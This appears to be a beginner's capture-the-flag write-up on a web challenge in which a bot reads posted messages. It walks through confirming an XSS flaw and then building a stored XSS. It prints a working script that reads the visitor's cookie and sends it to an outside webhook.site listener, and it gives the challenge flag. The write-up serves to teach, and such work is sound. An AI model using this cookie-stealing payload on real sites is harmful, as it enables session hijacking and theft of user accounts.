I liked this challenge! I’d read a bit about different types of XSS, but it was great to see how they work in practice.
We begin presented with a blank field to enter text, and a “Send Message” button.
Examination of the HTML code reveals nothing of interest.
The first thing I attempted was a Cross Site Script (XSS). I input the following message and hit send:
hello <script>alert(1)</script>
Sure enough, the page refreshes with my message “hello” but it also posts the alert box, so it is vulnerable to XSS.
I got a little lost at this point, since this XSS is a client side operation, so how could I get it to run server side?
I tried Server Side Inclusion without success; then a team mate suggested I consider the challenge wording.
Being new to CTF I thought what you see is what you get, but it became clear that there was an automation to simulate a person visiting the page to read what was posted.
With that knowledge, construction of a stored XSS was required.
First we need to set up a listener. I used https://webhook.site
This site provides randomly generated URL and email for temporary use.
The URL is of the form httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx
The following string redirects any visitors browser to our webhook site and steals their cookie.
hello <script>site=’httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx/?cookie=’;cookie=document.cookie; site=site.concat(cookie); document.location=site; </script>
Once we send this message, we can return to our webhook tab and the flag should be visible as a cookie:
flag=TG20{exfiltration_is_best_filtration}
mrn00b0t 